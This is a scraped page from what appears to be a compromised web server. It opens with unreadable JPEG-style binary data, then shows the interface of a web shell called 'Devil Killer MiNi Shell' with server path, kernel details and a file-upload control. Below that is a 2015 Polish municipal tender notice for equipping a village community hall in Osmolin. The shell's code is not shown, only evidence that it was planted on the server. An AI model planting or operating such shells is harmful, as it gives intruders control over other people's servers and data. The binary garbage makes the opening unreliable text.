JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150410/81606-N-2015.html

<p class="kh_header"><b>Sanniki: Przebudowa budynku świetlicy wiejskiej w Osmolinie wraz z zagospodarowaniem terenu (w ramach zadania dostawa wyposażenia)</b><br>
<b>Numer ogłoszenia: 81606 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanniki , ul. Warszawska 169, 09-540 Sanniki, woj. mazowieckie, tel. 24 277 68 51, faks 24 277 68 51, 277 78 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanniki.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku świetlicy wiejskiej w Osmolinie wraz z zagospodarowaniem terenu (w ramach zadania dostawa wyposażenia).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa i montaż wyposażenia w ramach zadania pn. Przebudowa budynku świetlicy wiejskiej w Osmolinie  wraz z zagospodarowaniem terenu.
Zamówienie obejmuje dostawę i montaż nowego wyposażenia z następujących grup asortymentowych:
Część I - Meble i gablota informacyjna,
Część II - Sprzęt gospodarstwa domowego 
Część III - Sprzęt radiowo - telewizyjny,
Część IV - Urządzenia komputerowe,
Część V - Sprzęt sportowy. 
Część VI  Urządzenie do transportu osób na wózkach inwalidzkich.
Szczegółowy opis przedmiotu zamówienia zawarty jest w opisie części zamówienia. 
Podane przez zamawiającego w opisie przedmiotu zamówienia  nazwy własne (pochodzenie, producent, itd.) mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów.
We wszystkich przypadkach, gdzie ze względu na specyfikę przedmiotu zamówienia i brak możliwości opisu przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, wskazano nazwy własne technologii, materiałów, wyrobów lub nazwy ich producentów, dopuszcza się zastosowanie technologii, materiałów i wyrobów równoważnych. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego 
w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.70.00.00-9, 32.30.00.00-6, 30.20.00.00-1, 37.40.00.00-2, 33.19.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1) Formularz ofertowy - załącznik nr 1 do SIWZ. III.6.2) . Kosztorys cenowy -załącznik nr 6 do SIWZ. Wykonawca wypełnia formularz ofertowy oraz kosztorys cenowy w zakresie oferowanych do wykonania części. III 6.3)Zobowiązanie podmiotów trzecich do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (jeśli dotyczy). III.6.3) 6.4) Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów. III.6.5) Dokumenty wymagane w przypadku składania oferty wspólnej. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. III.4.2), III.4.4) dla każdego wykonawcy z osobna, oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy - Prawo zamówień publicznych- wg załącznika nr 2 oraz pozostałe dokumenty mogą być złożone wspólnie. III.6.6) Dokumenty podmiotów zagranicznych. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - gwarancja - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Ustawy.
2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
   1) zatrudnienia podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona    przedmiot  umowy osobiście, 
    2) podwykonawcy oraz zakresu podwykonawstwa w przypadku, gdy Wykonawca wykonuje przedmiot umowy przy pomocy podwykonawców,
   3) wynagrodzenia umownego za zrealizowanie przedmiotu zamówienia
w przypadku ograniczenia zakresu rzeczowego przedmiotu umowy przez Zamawiającego ze względu na wystąpienie okoliczności, nie przewidzianych przez Zamawiającego. W takim przypadku wynagrodzenie umowne ulegnie obniżeniu proporcjonalnie do ilości dostaw objętych rezygnacją,
   4) w zakresie rodzaju/typu/modelu wyposażenia w przypadku obiektywnej niemożności dostarczenia sprzętu, mebli, bądź urządzeń,  wskazanych w ofercie, w szczególności w sytuacji zakończenia produkcji, niedostępności na rynku, umowę można zmienić co do rodzaju/typu/modelu wyposażenia, pod warunkiem zachowania minimalnych wymaganych parametrów dostarczanego wyposażenia określonych przez Zamawiającego w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanniki.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sannikach,
ul. Warszawska 169, 
09-540 Sanniki,
pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2015 godzina 09:50, miejsce: Urząd Gminy w Sannikach,
ul. Warszawska 169, 
09-540 Sanniki,
pokój nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt znajduje się na zatwierdzonej liście operacji w ramach działania Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013. 2. Udział innych podmiotów w realizacji zamówienia 2.1) Zgodnie z art. 26. ust.2b ustawy prawo zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 2.2) Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w pkt 1 zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących: - zakresu dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 2.3) Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust 2b ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy. 2.4) Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na zasoby którego Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia powyższe warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Meble i gablota informacyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na meble i gablotę informacyjną wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Przed dostawą wyposażenia Wykonawca ma obowiązek uzgodnić z zamawiającym kolor dostarczanych mebli. Wymagane jest dostarczenie wskazanych mebli 
w jednym kolorze. Preferowane przez zamawiającego kolory mebli: dąb, buk, olcha. Zamówienie obejmuje również montaż mebli i gabloty. 
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Wyposażenie kuchni - szafka pod zlewozmywak
Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć. Wymiary szafki 800x500x850cm.
Ilość zamawianych sztuk: 1.
2. Wyposażenie kuchni - szafka wisząca
Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć. Wymiary szafki 900x730x350cm.
Ilość zamawianych sztuk: 5.
3. Wyposażenie kuchni - regał magazynowy 
Regał o wymiarach: 120x60x200[h]cm. Półki wykonane z płyty meblowej gładkiej laminowanej, okleinowanej PCV - obciążenie jednej półki - 280 - 300 kg. 
Regał zaczepowy (montaż bez śrub). Ilość półek - 5szt.
Ilość zamawianych sztuk: 4.
4. Wyposażenie kuchni - stół  roboczy,  wykonany ze stali nierdzewnej. Stół przeznaczony do stosowania w ciągach technologicznych umożliwiających przyrządzanie i przygotowanie produktów przed ich termiczną obróbką, wyposażony w szufladę. 
Wymiary stołu (długość/szerokość/wysokość): 140x70x85 cm
Ilość zamawianych sztuk: 2.
5.Wyposażenie świetlicy - krzesło świetlicowe 
Krzesło o konstrukcji metalowej malowanej proszkowo z miękkim tapicerowanym siedziskiem i oparciem. Siedzisko z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym. Wysokość całkowita: 80-85 cm, szerokość siedziska: 50-55cm, głębokość siedziska: 40-45cm, wysokość siedziska 45-50 cm.
 Ilość zamawianych sztuk: 100.
6.Wyposażenie świetlicy - gablota ogłoszeniowa 
Gablota zewnętrzna jednodrzwiowa oświetlana  
Format: 10xA4
Wykonana z profili anodowanych kolor inox/srebrny. 
Minimalne wymiary: 130x80x6,5 cm
Ilość zamawianych sztuk: 1.
7.Wyposażenie świetlicy - krzesło komputerowe 
Krzesło obrotowe a rolkach z miękkim tapicerowanym siedziskiem i oparciem, metalowa konstrukcja.
Siedzisko z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym. Wysokość całkowita: 80-85 cm, szerokość siedziska: 50-55cm, głębokość siedziska: 
40-45cm, wysokość siedziska 45-50 cm.
 Ilość zamawianych sztuk: 1.
8. Wyposażenie świetlicy - biurko pod komputer 
Wykonanie z płyty meblowej laminowanej o grubości: blaty - 30 mm, ścianki 20mm, okleinowanej PCV, kolor - klon. 
Stopki plastikowe zabezpieczające podłoże przed rysowaniem.
Wymiary: długość: 140 cm, szerokość: 80 cm wysokość: 75-80 cm.
Ilość zamawianych sztuk: 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt gospodarstwa domowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na sprzęt gospodarstwa domowego wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Wyposażenie kuchni - kuchenka mikrofalowa, 
Kuchenka sterowana elektronicznie o pojemności min 20 l, z wyświetlaczem elektronicznym. Wymagane minimalne funkcje: grill, termoobieg, rozmrażanie. Kolor: inox /srebrny.
Ilość zamawianych sztuk: 1.
2. Wyposażenie kuchni - czajnik elektryczny bezprzewodowy 
Czajnik ze wskaźnikiem poziomu wody o pojemności min.1,7 l. z filtrem antywapiennym, wykonany ze stali nierdzewnej. Element grzejny - płaska płyta, moc min. 2000 W. 
Kolor - inox/srebrny.
Ilość zamawianych sztuk: 2
3. Wyposażenie kuchni - lodówko-zamrażarka 
Dane techniczne:
-	klasa energetyczna: min. A 
-	pojemność chłodziarki: min.300 l 
-	rodzaj: side by side
-	posiada system No frost 
-	szerokość: 85-95 cm 
-	wysokość: 173-186 cm 
-	głębokość min. 66 cm
Kolor: inox /srebrny.
Ilość zamawianych sztuk: 1.
4. Wyposażenie kuchni - kuchnia gazowa z piekarnikiem elektrycznym, sterowana elektronicznie z wyświetlaczem elektronicznym, wymagane funkcje: turbo-grill (opiekacz obrotowy), termo-obieg, funkcja rozmrażania, wbudowane zapalarki palników, automatyczne odcięcie gazu, oświetlenie wnętrza, szuflada. 
System grzania komory - góra, dół oraz góra i dół. Wykonana ze stali nierdzewnej, kolor inox/srebrny. 
Dane techniczne:
- wymiary: 500 x 850 x 600 mm,
- zasilanie: 3 NPE 230V 50 Hz,
- klasa energetyczna: min. A,
- pojemność piekarnika: min.55 litrów,
- ilość palników: 4, łączna moc min 8,0kW,
- moc piekarnika: max 4 kW,
- zakres temp. płynna regulacja od 50 stopni C do 250 stopni C.
Ilość zamawianych sztuk: 1.
5. Wyposażenie kuchni - okap kuchenny kominowy 
Okap wykonany ze stali nierdzewnej w kolorze inox/srebrny, funkcje dodatkowe:  programator, pilot, czujnik wymiany filtra. 
Dane techniczne:
- typ okapu:  kominowy 
- szerokość:  90 cm 
- wydajność:  650 m3/h 
- sterowanie:  elektroniczne 
- oświetlenie:  halogenowe 2x35W 
- warianty pracy:  wyciąg lub pochłaniacz 
- głośność:  max. 54 dB
- wyposażenie eksploatacyjne: filtry aluminiowe-1szt., filtry węglowe-2 szt.
Ilość zamawianych sztuk: 1.
6. Wyposażenie kuchni - szafa chłodnicza 
Dane techniczne:
-	wymiary zewnętrzne: min.750x730x1640 mm
-	Wymiary wewnętrzne: min.600 x 560 x 145 mm
-	Pojemność całkowita min.544 l
